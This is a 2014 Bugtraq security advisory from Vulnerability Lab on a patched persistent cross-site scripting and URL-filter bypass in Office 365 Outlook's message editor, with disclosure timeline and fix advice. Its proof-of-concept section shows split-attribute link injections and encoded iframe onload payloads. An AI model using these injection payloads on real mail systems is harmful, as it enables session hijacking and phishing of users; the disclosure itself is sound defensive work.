[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Microsoft Office 365 Outlook - Filter Bypass & Persistent Editor Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2014-02-28 13:42:18
Message-ID: 5310923A.2060506 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Microsoft Office 365 Outlook - Filter Bypass & Persistent Editor Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=811
Microsoft Security Response Center (MSRC) ID: 14095
Release Date:
=============
2014-02-28
Vulnerability Laboratory ID (VL-ID):
====================================
811
Common Vulnerability Scoring System:
====================================
4.3
Product & Service Introduction:
===============================
Office 365 primarily denotes a set of subscription based software services that \
require monthly or periodic payment of fees to Microsoft Corporation. By contrast, \
Office 20XX generally refers to a suite of desktop applications that alone by \
themselves are not subscription based and do not carry monthly fees.
Although Office 365 also often refers to cloud-based services rather than desktop \
applications, certain Office 365 subscription plans include a subscription to Office \
20XX desktop applications in addition to cloud-based services. The subscription to \
Office 20XX desktop applications, by virtue of the subscription, makes the \
subscription part of an Office 365 offering.
Office 365 was initially announced in the autumn of 2010, and was made available to \
the public on June 28, 2011. The initial subscription plans included a Professional \
plan (for organizations of 25 and smaller) and an Enterprise plan (for organizations \
with more individuals). Microsoft also offers a Dedicated and ITAR subscription model \
for large companies. The Office 365 Dedicated offering isolates servers to be used \
for only a single customer while ITAR (AKA Federal) offers a higher level of \
security (individual background checks and extremely-limited access to sensitive \
parts of the system by knowledge workers) that complies with the ITAR standard.
Depending on the subscription plan, Office 365 can include a subscription to Office \
20XX desktop applications, in addition to hosted versions of Microsoft`s Server \
products (including Exchange Server, SharePoint Server, and Lync Server) that are \
delivered and accessed over the Internet, in effect, the next version of Business \
Productivity Online Suite (BPOS). In December 2011, Microsoft launched Trust Center \
and announced that Office 365 now complies with EU privacy regulations.
(Copy of the Homepage: http://en.wikipedia.org/wiki/Microsoft_Office_365)
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a filter bypass issue and \
persistent input validation vulnerability in the official Microsoft (cloud-based) \
Outlook Office 365 web-application.
Vulnerability Disclosure Timeline:
==================================
2013-02-02: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-02-06: Vendor Notification (Microsoft Security Response Team - MSRC)
2013-02-07: Vendor Response/Feedback (Microsoft Security Response Team - MSRC)
2014-02-23: Vendor Fix/Patch (Microsoft Developer Team by Check)
2014-02-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Microsoft Corp.
Product: Office 365 (cloud-based)
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official \
Microsoft (cloud-based) Outlook Office 365 web-application. The vulnerability allows \
remote attackers to inject own malicious script codes to the application-side \
(persistent) of the vulnerable module.
The bug is located in the `Send Message` section when processing to request via the \
`Editor` module the connected vulnerable url/link application insert function via \
POST method. Remote attackers can inject own malicious links with a splitted request \
to bypass the encoding and validation of the outlook cloud formular.
The second effect is the url block filter get evaded by processing to request the \
public message in office 365. Exploitation of the vulnerability requires low user \
interaction with a low privileged application user account. The vulnerability can be \
exploited in all outlook cloud to office 365 available editors via reply, forward & \
direct message.
The execution of the persistent injected script code after the filter bypass occurs \
in the mail messages & mail item preview list context. Second execution occurs when \
processing to answer, forward or reply to a prepared malicious email in the link \
mouseover label information. The security risk of the filter bypass and persistent \
input validation web vulnerability is estimated as medium(+)|(-)high with a cvss \
(common vulnerability scoring system) count of 5.1(+)|(-)5.2.
Successful exploitation of the vulnerability result in session hijacking, persistent \
outlook mail phishing, persistent external redirects by mail malicious context on \
mouseovers and persistent manipulation of affected or connected module context.
Vulnerable Section(s):
[+] Microsoft Corp - Office 365 (cloud-based) \
Application > Outlook (Cloud)
Vulnerable Module(s):
[+] Message Editor
Vulnerable Parameter(s):
[+] URL - Link
Affected Module(s):
[+] Message Editor (Local)
[+] Message Listings (Remote)
Affected Module(s):
[+] URL Block Filter Bypass - Mail Listing & Preview
[+] Edit Outlook Mail - mouseover < link
Proof of Concept (PoC):
=======================
The Vulnerability can be exploited by remote and local attackers with low required \
user interaction and with low privileged application user account. For demonstration \
or reproduce ...
Review: Message Editor - URL - Link
<html dir="ltr"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<style id="owaParaStyle" type="text/css">P \
{margin-top:0;margin-bottom:0;}</style><style id="owaTempEditStyle" type="text/css"> \
BODY {scrollbar-base-color:undefined;scrollbar-highlight-color:undefined;scrollbar-darkshadow-color:undefined;scrollbar-track-color:
undefined;scrollbar-arrow-color:undefined}BODY {direction: ltr;font-family: \
Tahoma;color: #000000;font-size: 10pt;}</style></head> <body ocsi="1" fpstyle="1"><a \
href="http://www.restriction-bypass.com %20%20"><[PERSISTENT INJECTED SCRIPT \
CODE!])<">sadasdasd </a> <a href="http://<[PERSISTENT INJECTED SCRIPT CODE!]>.com \
<[PERSISTENT INJECTED SCRIPT CODE!]>%20%20%20%20"><[PERSISTENT INJECTED SCRIPT \
CODE!]) <"><br></a><br><br><a \
href="http://www.vuln-lab.com">ptest</a><br></body></html>
Strings:
<a href="http://www.google.com%20%20%20%22%3E%3C[PERSISTENT INJECTED SCRIPT \
CODE!]337]%29%20%3C">https://www..outlook.com/</a>
...
<body ocsi="1" fpstyle="1"><a href="http://www.restriction-bypass.com \
%20%20"><[PERSISTENT INJECTED SCRIPT CODE!])<">
Note:
After the inject you can save the messsage and send it to another user as mail with \
document. The evil test code will bypass the url block filter block too.
Reference(s):
Editor Main - New Message
https://db3prd0411.outlook.com/owa/?ae=Item&t=IPM.Note&a=New id=RgAAAADrNObEaQpDTqiFs
tabwb5OBwAUN7OhArS%2bRpYIS2cjJ1O6AAAAyBsfAAAUN7OhArS%2bRpYIS2cjJ1O6AAAAyHIWAAAJ&pspid=_1356986243848_891211515
Editor Main - New Message - PreFormAction > Forward
https://db3prd0411.outlook.com/owa/?ae=PreFormAction&a=Forward&t=IPM.Task&id=RgAAAADrNObEaQpDT
qiFstabwb5OBwAUN7OhArS%2bRpYIS2cjJ1O6AAAAyBsiAAAUN7OhArS%2bRpYIS2cjJ1O6AAAAyKGsAAAT&pspid=_1356988842671_885815302
https://db3prd0411.outlook.com/owa/?ae=Item&a=New&t=IPM.Appointment&mr=1&pspid=_1356989287630_946606254
Editor Main - Item > IPM.Note
https://db3prd0411.outlook.com/owa/?ae=Item&t=IPM.Note&a=New&to=%2fo%3dExchangeLabs%2fou%3dExchange%20Administrative%20Group%20%28FYDIBOHF23SPDLT%29%2fc
n%3dRecipients%2fcn%3d290a6110a49548638d210cca28dbfbf9-bkms&nm=%3Ciframe%20%3Ciframe%20src%3da%3E%2520%2520%2520%2520%22%3E%3Ciframe%20src%3da%20on
load%3dalert%28%22VL%22%29%20%3C&ao=2&pspid=_1356989652193_934947028
https://db3prd0411.outlook.com/owa/?ae=Item&t=IPM.Note&a=New&to=%2fo%3dExchangeLabs%2fou%3dExchange%20Administrative%20Group%20%28FYDIBOHF23SPDLT%29%2fcn
%3dRecipients%2fcn%3d290a6110a49548638d210cca28dbfbf9-bkms&nm=%3Ciframe%20%3Ciframe%20src%3da%3E%2520%2520%2520%2520%22%3E%3Ciframe%20src%3da%20onload%3d
alert%28%22VL%22%29%20%3C&ao=2&pspid=_1356989652193_934947028
Editor Main - Reply Message
https://db3prd0411.outlook.com/owa/?ae=PreFormAction&a=Reply&t=IPM.Note&id=RgAAAADrNObEaQpDTqiFstabwb5OBwAUN7OhArS%2bRpYIS2cjJ1O6AAAAyBsfAAAUN7OhArS
%2bRpYIS2cjJ1O6AAAAyHIXAAAJ&pspid=_1356990415743_595927187
Solution - Fix & Patch:
=======================
The solution is the restrict the input field of the url/link function in the editor \
with a secure filter mask. The vulnerability can be patched by a recognize of \
splitted injected request after the first provoke of an invalid url. Parse also the \
editor label display output listing when processing mouseover a link. Correct the url \
block filter to recognize script code injects via splitted POST injection request.
Security Risk:
==============
The security risk of the persistent input validation vulnerability is estimated as \
medium(+)|(-)high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri \
(bkm@vulnerability-lab.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including \
the warranties of merchantability and capability for a particular purpose. \
Vulnerability- Lab or its suppliers are not liable in any case of damage, including \
direct, indirect, incidental, consequential loss of business profits or special \
damages, even if Vulnerability-Lab or its suppliers have been advised of the \
possibility of such damages. Some states do not allow the exclusion or limitation of \
liability for consequential or incidental damages so the foregoing limitation may \
not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - \
www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - \
vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, \
including the use of other media, are reserved by Vulnerability-Lab Research Team or \
its suppliers. All pictures, texts, advisories, source code, videos and other \
information on this website is trademark of vulnerability-lab team & the specific \
authors or managers. To record, list (feed), modify, use or edit our material \
contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a \
permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic